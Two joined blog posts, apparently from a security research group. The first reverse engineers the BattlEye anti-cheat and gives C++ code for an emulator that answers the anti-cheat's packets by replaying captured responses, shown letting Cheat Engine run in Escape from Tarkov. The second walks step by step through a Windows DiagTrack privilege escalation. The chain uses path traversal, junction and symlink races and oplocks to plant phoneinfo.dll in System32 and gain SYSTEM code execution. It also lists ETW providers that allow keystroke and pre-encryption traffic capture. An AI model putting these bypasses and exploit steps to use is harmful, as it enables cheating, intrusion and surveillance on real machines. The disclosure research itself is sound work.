The popular anti-cheat BattlEye is widely used by modern online games such as Escape from Tarkov and is considered an industry standard anti-cheat by many. In this article I will demonstrate a method I have been utilizing for the past year, which enables you to play any BattlEye-protected game online without even having to install BattlEye.

BattlEye initialisation

BattlEye is dynamically loaded by the respective game on startup to initialize the software service (“BEService”) and kernel driver (“BEDaisy”). These two components are critical in ensuring the integrity of the game, but the most critical component by far is the usermode library (“BEClient”) that the game interacts with directly. This module exports two functions: GetVer and more importantly Init.

The Init routine is what the game will call, but this functionality has never been documented before, as people mostly focus on BEDaisy or their shellcode. Most important routines in BEClient, including Init, are protected and virtualised by VMProtect, which we are able to devirtualise and reverse engineer thanks to vtil by secret club member Can Boluk, but the inner workings of BEClient is a topic for a later part of this series, so here is a quick summary.

Init and its arguments have the following definitions:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data);
  
enum instance_status
{
    NONE,
    NOT_INITIALIZED,
    SUCCESSFULLY_INITIALIZED,
    DESTROYING,
    DESTROYED
};

struct becl_game_data
{
    char*         game_version;
    std::uint32_t address;
    std::uint16_t port;

    // FUNCTIONS
    using print_message_t = void(*)(char* message);
    print_message_t print_message;

    using request_restart_t = void(*)(std::uint32_t reason);
    request_restart_t request_restart;

    using send_packet_t = void(*)(void* packet, std::uint32_t length);
    send_packet_t send_packet;

    using disconnect_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length, char* reason);
    disconnect_peer_t disconnect_peer;
};

struct becl_be_data
{
    using exit_t = bool(*)();
    exit_t exit;

    using run_t = void(*)();
    run_t run;

    using command_t = void(*)(char* command);
    command_t command;

    using received_packet_t = void(*)(std::uint8_t* received_packet, std::uint32_t length);
    received_packet_t received_packet;

    using on_receive_auth_ticket_t = void(*)(std::uint8_t* ticket, std::uint32_t length);
    on_receive_auth_ticket_t on_receive_auth_ticket;

    using add_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    add_peer_t add_peer;

    using remove_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    remove_peer_t remove_peer;
};

As seen, these are quite simple containers for interopability between the game and BEClient. becl_game_data is defined by the game and contains functions that BEClient needs to call (for example, send_packet) while becl_be_data is defined by BEClient and contains callbacks used by the game after initialisation (for example, received_packet). Note that these two structures slightly differ in some games that have special functionality, such as the recently introduced packet encryption in Escape from Tarkov that we’ve already cracked. Older versions of BattlEye (DayZ, Arma, etc.) use a completely different approach with function pointer swap hooks to intercept traffic communication, and therefore these structures don’t apply.

A simple Init implementation would look like this:

// BEClient_x64!Init
__declspec(dllexport)
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data)
{
    // CACHE RELEVANT FUNCTIONS
    battleye::delegate::o_send_packet    = game_data->send_packet;

    // SETUP CLIENT STRUCTURE
    client_data->exit                   = battleye::delegate::exit;
    client_data->run                    = battleye::delegate::run;
    client_data->command                = battleye::delegate::command;
    client_data->received_packet        = battleye::delegate::received_packet;
    client_data->on_receive_auth_ticket = battleye::delegate::on_receive_auth_ticket;
    client_data->add_peer               = battleye::delegate::add_peer;
    client_data->remove_peer            = battleye::delegate::remove_peer;

    return battleye::instance_status::SUCCESSFULLY_INITIALIZED;
}

This would allow our custom BattlEye client to receive packets sent from the game server’s BEServer module.

Packet handling

The function received_packet is by far the most important routine used by the game, as it handles incoming packets from the BattlEye server component. BattlEye communication is extremely simple compared to how important the integrity of it is. In recent versions of BattlEye, packets follow the same general structure:

#pragma pack(push, 1)
struct be_fragment
{
    std::uint8_t count;
    std::uint8_t index;
};

struct be_packet_header
{
    std::uint8_t id;
    std::uint8_t sequence;
};

struct be_packet : be_packet_header
{
    union 
    {
        be_fragment fragment;

        // DATA STARTS AT body[1] IF PACKET IS FRAGMENTED
        struct
        {
            std::uint8_t no_fragmentation_flag;
            std::uint8_t body[0];
        };
    };
    inline bool fragmented()
    {
        return this->fragment.count != 0x00;
    }
};
#pragma pack(pop)

All packets have an identifier and a sequence number (which is used by the requests/response communication and the heartbeat). Requests and responses have a fragmentation mode which allows BEServer and BEClient to send packets in chunks of 0x400 bytes (seemingly arbitrary) instead of sending one big packet.

In the current iteration of BattlEye, the following packets are used for communication:

INIT (00)

This packet is sent to the BEClient module as soon as the connection with the game server has been established. This packet is only transmitted once, contains no data besides the packet id 00 and the response to this packet is simply 00 05.

START (‘02’)

This packet is sent right after the ‘INIT’ packets have been exchanged, and contains the server-generated guid of the client. The response of this packet is simply the header: 02 00

REQUEST (04) / RESPONSE (05)

This type of packet is sent from BEServer to BEClient to request (and in rare cases, simply transmit) data, and BEClient will send back data for that request using the RESPONSE packet type.

The first request contains crucial information such as service- and integration version, not responding to it will get you disconnected by the game server. Afterwards, requests are game specific.

HEARTBEAT (09)

This type of packet is used by the BEServer module to ensure that the connection hasn’t been dropped. It is sent every 30 seconds using a sequential index, and if the client doesn’t respond with the same packet, the client is disconnected from the game server. This heartbeat packet is only three bytes long, with the sequential index used for synchronization being incremental and therefore easily emulated. An example heartbeat could be: 09 01 00, which is the second heartbeat (sequence starts at zero) transmitted.

Emulation

With this knowledge, it is possible by emulating the entire BattlEye anti-cheat with only two proprietary points of data: the responses for request sequence one and two. These can be intercepted using a tool such as wireshark and replayed as many times as you want for the respective game, because the packet encryption used by BattlEye is static and contextless.

Emulating the INIT packet is as stated simply responding with the sequence number five:

case battleye::packet_id::INIT:
{
    auto info_packet = battleye::be_packet{};
    info_packet.id       = battleye::packet_id::INIT;
    info_packet.sequence = 0x05;

    battleye::delegate::o_send_packet(&info_packet, sizeof(info_packet));
    break;
}

Emulating the START packet is done by replying with the received packet’s header:

case battleye::packet_id::START:
{
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));
    break;
}

Emulating the HEARTBEAT packets is done by replying with the received packet:

case battleye::packet_id::HEARTBEAT:    
{
    battleye::delegate::o_send_packet(received_packet, length);
    break;
}

Emulating the REQUEST packets can be done by replaying previously generated responses, which can be logged with code hooks or man-in-the-middle software. These packets are game specific and some games might disconnect you for not handling a specific request, but most games only require the first two requests to be handled, afterwards simply replying with the packet header is enough to not get disconnected by the game server. It is important to notice that all REQUEST packets are immediately responded to with the header, to let the server know that the client is aware of the request. This is how BottlEye emulates them:

case battleye::packet_id::REQUEST:
{
    // IF NOT FRAGMENTED RESPOND IMMEDIATELY, ELSE ONLY RESPOND TO THE LAST FRAGMENT
    const auto respond = 
        !header->fragmented() || 
        (header->fragment.index == header->fragment.count - 1);

    if (!respond)
        return;

    // SEND BACK HEADER
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));

    switch (header->sequence)
    {
    case 0x01:
    {
        battleye::delegate::respond(header->sequence,
            {
                // REDACTED BUFFER
            });
        break;
    }
    case 0x02:
    {
        battleye::delegate::respond(header->sequence, 
            {    
                // REDACTED BUFFER
            });
        break;
    }
    default:
        break;
    }
    break;
}

Which uses the following helper function for responses:

void battleye::delegate::respond(
    std::uint8_t response_index, 
    std::initializer_list<std::uint8_t> data)
{
    // SETUP RESPONSE PACKET WITH TWO-BYTE HEADER + NO-FRAGMENTATION TOGGLE

    const auto size = sizeof(battleye::be_packet_header) + 
                      sizeof(battleye::be_fragment::count) + 
                      data.size();

    auto packet = std::make_unique<std::uint8_t[]>(size);
    auto packet_buffer = packet.get();

    packet_buffer[0] = (battleye::packet_id::RESPONSE); // PACKET ID
    packet_buffer[1] = (response_index - 1);            // RESPONSE INDEX
    packet_buffer[2] = (0x00);                          // FRAGMENTATION DISABLED


    for (size_t i = 0; i < data.size(); i++)
    {
        packet_buffer[3 + i] = data.begin()[i];
    }

    battleye::delegate::o_send_packet(packet_buffer, size);
}

BottlEye

The full BottlEye project can be found on our GitHub repository. Below you can see this specific project being used in various popular video games.

Fortnite

The following video contains a live demonstration of my BottlEye project being used in the BattlEye-protected game Fortnite. In the video I live debug fortnite while playing online to prove that BattlEye is not loaded.

Insurgency

The following screenshot shows the BattlEye-protected game Insurgency running on Arch in Wine.

Escape from Tarkov

The following screenshot shows the usage of Cheat Engine in the popular, battleye-protected game Escape from Tarkov. This is possible because BattlEye has been replaced with BottlEye on disk.

Thanks to

  • Sabotage
  • Tamimego
  • Atex
  • namazso

Windows Telemetry service elevation of privilege

1 July 2020 at 23:00
By: Jonas L

Today, we will be looking at the “Connected User Experiences and Telemetry service,” also known as “diagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as “Advanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed that file path relative to the system directory aforementioned and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
 <Profiles>
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  </SystemCollector>  
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
  </EventCollector>
   <SystemProvider Id="SystemProvider" /> 
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
   <Collectors>
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    </SystemCollectorId> 
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
     <EventProviders>
      <EventProviderId Value="EventProvider_d1d93ef7" />
     </EventProviders>
    </EventCollectorId>    
    </Collectors>
  </Profile>
 </Profiles>
</WindowsPerformanceRecorder>

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to: \..\..\file.txt: which becomes the below:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack\..\..\file.txt:.etl

This results in C:\Windows\Temp\file.txt being used.

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

<EventData>
 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>
</EventData>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the files content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (Where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This allows destination control to be acquired because rename operations that occur where the source file gets created in a folder that grants non-privileged users write access are exploitable. This is due to the permission inheritance of files and their parent directories. When a file is moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32, and somehow move the file then we will still have write permission to the file. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection is necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operations destination. For instance, setting it to\??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because, before the rename operation is done, the destination folder is opened, but now is an object directory. This means it’s unable to be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond there is 50% chance of getting the benign directory when the folder check is done and 50% chance of getting the object directory when the rename happens. That gives 25% chance for a rename to validate the check but end up as phoneinfo.dll in System32. I try avoiding race conditions if possible, but in this situation there did not appear to be any other ways forward and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100.]etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgmr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privileged check, additional command prompts would spawn since phoneinfo.dll is also attempted to be loaded by the process that initiates the error reporting.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

❌